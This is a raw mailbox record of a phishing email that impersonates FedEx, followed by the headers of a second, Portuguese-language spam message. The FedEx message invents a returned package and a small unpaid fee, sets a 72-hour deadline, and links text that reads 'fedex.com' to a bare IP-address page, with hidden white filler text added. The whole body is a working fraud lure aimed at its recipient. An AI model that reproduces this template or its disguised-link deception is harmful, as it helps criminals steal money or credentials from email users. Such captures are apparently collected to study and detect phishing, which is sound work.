From: Shipment@fedex.com
To: jose@monkey.org
Subject: Tracking Your Shipment | FedEx
Date: 03 Oct 2018 05:27:27 -0700
Message-ID: <20181003052727.448806616F517CE5@fedex.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0012_B36E9DA8.B2A91EE5"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 611


------=_NextPart_000_0012_B36E9DA8.B2A91EE5
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Enter your tracking number to track and pay

------=_NextPart_000_0012_B36E9DA8.B2A91EE5
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19061"></HEAD>
<BODY style=3D"MARGIN: 0.5em">
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
><IMG alt=3D"FedEx Home" src=3D"https://images.fedex.com/images/c/t1/gh/log=
o-header-fedex-express.png"><BR><BR>Dear Customer,</P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
>Your package has been returned to the FedEx office.<BR>The reason for the =
return is - payment of shipping costs.<BR>
the landed cost of your shipment is not paid yet so you will be charged to =
pay handling cost 04.5&nbsp;USD <BR>You have a period of 72 hours to recove=
r your package, otherwise it will be returned to the sender.<BR><BR></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial">
Enter your tracking number to track and pay<BR><BR><FONT style=3D"BACKGROUN=
D-COLOR: rgb(255,255,255)" color=3D#000000><STRONG>Tracking Numbers :</STRO=
NG></FONT><BR></P>
<H2 id=3Dx_x_x_x_ecxyui_3_16_0_1_1421937263738_21639 style=3D"WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); PADD=
ING-BOTTOM: 0px; PADDING-TOP: 0px; FONT: 15px/21px Verdana, Arial; PADDING-=
LEFT: 0px; MARGIN: 0px 0px 10px; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0=
px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-de=
coration-color: initial"></H2>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
>
<TABLE id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_1=
6_0_1_1401807633682_59616 style=3D"FONT-SIZE: 11px; HEIGHT: 15px; FONT-FAMI=
LY: arial, sans-serif; WIDTH: 254px; WHITE-SPACE: normal; WORD-SPACING: 0px=
; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(34,34,34); PADDING-=
BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT: 15px; PADDING-RIGHT:=
 0px; BACKGROUND-COLOR: rgb(255,255,255);=20
TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-deco=
ration-color: initial" cellSpacing=3D0 cellPadding=3D10 border=3D0>
<TBODY id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_1=
6_0_1_1401807633682_59615 style=3D"WIDTH: 530px; LINE-HEIGHT: 15px">
<TR id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_0=
_1_1401807633682_59614 style=3D"LINE-HEIGHT: 15px">
<TD id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_0=
_1_1401807633682_59613 style=3D"FONT-FAMILY: arial, sans-serif; BORDER-SPAC=
ING: 2px; LINE-HEIGHT: 15px; BACKGROUND-COLOR: rgb(232,241,250)"><SPAN styl=
e=3D"FONT-FAMILY: arial, sans-serif, serif, EmojiFont; FONT-WEIGHT: bold; L=
INE-HEIGHT: 15px">
<UL style=3D"MARGIN-TOP: 0px">
<LI>
<H4 style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); FONT=
-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT:=
 0px"><FONT color=3D#44bb47 size=3D4>780032194102</FONT></H4></LI></UL></SP=
AN></TD>
<TD id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407yui_3_16_0_1_1402917244929=
_62474 style=3D"FONT-SIZE: 0px; FONT-FAMILY: Arial, Helvetica, sans-serif; =
COLOR: rgb(255,255,255); BORDER-SPACING: 2px; LINE-HEIGHT: 0px" vAlign=3Dto=
p align=3Dleft>djdj</TD></TR></TBODY></TABLE>
<BR style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR=
: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING:=
 normal; LINE-HEIGHT: 15px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT=
: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-t=
ext-stroke-width: 0px; text-decoration-style: initial; text-decoration-colo=
r: initial">
<A style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(1,134,186); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-li=
gatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px"=
 href=3D"http://104.168.140.169//rediction-fedex/livraison-shipping/FD54879=
6055/" rel=3Dnoreferrer target=3D_blank><FONT size=3D3>
Click here to view the status of your order<BR>fedex.com/apps/fedextrack/?a=
ction=3Dtrack</FONT></A>
<FONT style=3D"FONT-FAMILY: arial, sans-serif; WHITE-SPACE: normal; WORD-SP=
ACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); F=
ONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUN=
D-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal=
; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoratio=
n-style: initial; text-decoration-color: initial"><FONT size=3D3><SPAN>&nbs=
p;<BR><BR></SPAN></FONT></FONT>
<BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: r=
gb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-li=
gatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px;=
 text-decoration-style: initial; text-decoration-color: initial"></P>
<H2 id=3Dx_x_x_x_ecxyui_3_16_0_1_1421937263738_21639 style=3D"WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); PADD=
ING-BOTTOM: 0px; PADDING-TOP: 0px; FONT: 15px/21px Verdana, Arial; PADDING-=
LEFT: 0px; MARGIN: 0px 0px 10px; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0=
px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-de=
coration-color: initial">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59620 style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-=
serif, serif, EmojiFont; FONT-WEIGHT: normal; PADDING-TOP: 0px; LINE-HEIGHT=
: 15px; BORDER-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59619 style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 15px; BORDE=
R-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59619 style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 15px; BORDE=
R-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyui_3_16_0_1_140215707=
5943_8702 style=3D"FONT-FAMILY: Calibri, sans-serif, serif, EmojiFont; COLO=
R: rgb(68,68,68); PADDING-TOP: 0px; LINE-HEIGHT: 21px; BORDER-TOP-WIDTH: 0p=
x"><SPAN style=3D"FONT-SIZE: small; LINE-HEIGHT: 18px"><FONT style=3D"LINE-=
HEIGHT: normal" size=3D3>Thank You for understanding</FONT></SPAN></DIV>
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyui_3_16_0_1_140215707=
5943_8704 style=3D"FONT-FAMILY: Calibri, sans-serif, serif, EmojiFont; COLO=
R: rgb(68,68,68); LINE-HEIGHT: 21px"><SPAN style=3D"FONT-SIZE: small; LINE-=
HEIGHT: 18px"><FONT style=3D"LINE-HEIGHT: normal" size=3D3>
<SPAN class=3D"x_x_x_contextualExtensionHighlight x_x_x_ms-font-color-theme=
Primary x_x_x_ms-border-color-themePrimary x_x_x_ident_596_602" style=3D"BO=
RDER-TOP-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BOR=
DER-LEFT-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rg=
b(67,33,88)">
<SPAN class=3D"x_x_contextualExtensionHighlight x_x_ms-font-color-themePrim=
ary x_x_ms-border-color-themePrimary x_x_ident_625_631" style=3D"BORDER-TOP=
-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEFT=
-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33,=
88)">
<SPAN class=3D"x_contextualExtensionHighlight x_ms-font-color-themePrimary =
x_ms-border-color-themePrimary x_ident_661_667" style=3D"BORDER-TOP-COLOR: =
rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEFT-COLOR: =
rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33,88)">
<SPAN class=3D"contextualExtensionHighlight ms-font-color-themePrimary ms-b=
order-color-themePrimary ident_702_708" style=3D"CURSOR: pointer; BORDER-TO=
P-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEF=
T-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33=
,88)">best regards</SPAN></SPAN></SPAN></SPAN></FONT></SPAN></DIV></DIV></D=
IV></DIV></H2>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
><BR>&nbsp;</P></BODY></HTML>
------=_NextPart_000_0012_B36E9DA8.B2A91EE5--


From jose@monkey.org Wed Oct  3 19:16:01 2018 +0000
Return-Path: www-data@expul7.bounceme.net
Delivered-To: jose@monkey.org
X-FDA: 74678916522.11.edge13_1773a7eb79f20
X-Spam-Summary: 50,1,0,04ae125fe46ca1a1,d41d8cd98f00b204,www-data@expul7.bounceme.net,:,RULES_HIT:41:72:327:355:375:379:455:495:800:960:962:967:973:978:982:983:988:989:1189:1208:1224:1260:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1545:1546:1556:1571:1588:1589:1592:1593:1594:1619:1620:1710:1714:1719:1730:1744:1747:1777:1792:2194:2198:2199:2200:2369:2393:2525:2527:2528:2568:2610:2682:2685:2731:2828:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3171:3351:3586:3653:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4250:4321:4384:4596:4597:4605:5007:6114:6117:6238:6261:6642:6650:6669:6674:7783:7875:7974:8599:8603:8957:8987:9025:9040:9388:9915:10004:10053:10085:10299:10305:10346:11026:11657:11658:11805:11914:12043:12049:12438:12555:12679:12698:12737:12740:12764:12767:12895:12956:12958:12960:12961:12963:12986:13017:13018:13019:13025:13080:13139:13439:13975:14799:14877:18000:21080:21107:21221:21347:21
X-HE-Tag: edge13_1773a7eb79f20
X-Filterd-Recvd-Size: 29453
Received: from scw-ace066.cloud.online.net (expul5.bounceme.net [51.15.227.43])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  3 Oct 2018 19:16:01 +0000 (UTC)
Received: by scw-ace066.cloud.online.net (Postfix, from userid 33)
	id 6E24F6AB78; Wed,  3 Oct 2018 19:00:00 +0000 (UTC)
To: jose@monkey.org
Subject: Parabéns jose@monkey.org  - Cupom promocional
X-PHP-Originating-Script: 0:vai.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
